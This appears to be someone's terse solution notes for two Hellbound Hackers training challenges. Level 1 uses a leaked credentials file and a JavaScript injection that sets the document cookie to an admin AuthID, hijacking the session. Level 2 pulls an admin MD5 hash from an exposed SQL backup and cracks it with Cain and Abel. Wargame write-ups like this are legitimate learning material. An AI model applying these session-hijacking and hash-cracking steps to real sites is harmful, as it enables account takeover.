lv1:
johndoe/password
http://www.hellboundhackers.org/challenges/real1/images/administrator.txtadministrator
password = password:60c033095644bd16
status:administrator
AuthID: 4601420
JohnDoe
password = password:5d2e19393cc5ef67
Network analysis
sessionid: 4601597
--> Using Js Inject
javascript:document.cookie="AuthID=4601420";-->Refesh-->ok
lv 2:
using scan tools (self coding)
http://www.hellboundhackers.org/challenges/real2/backups/backup_2004-09-04_1900.sql Backups For HellBound | |
------------------------
|
HellBound Backup File |
========================================== |
'HellBound_Users' |
admin: '9acb44549b41563697bb490144ec6258' |
========================================== |
End Of Backup File |
------------------------ |
No More Backups | |
--------------------------------------------------------
9acb44549b41563697bb490144ec6258 --> MD5 hash
using Cain and Abel
Plaintext of 9acb44549b41563697bb490144ec6258 is status
Attack stopped!
1 of 1 hashes cracked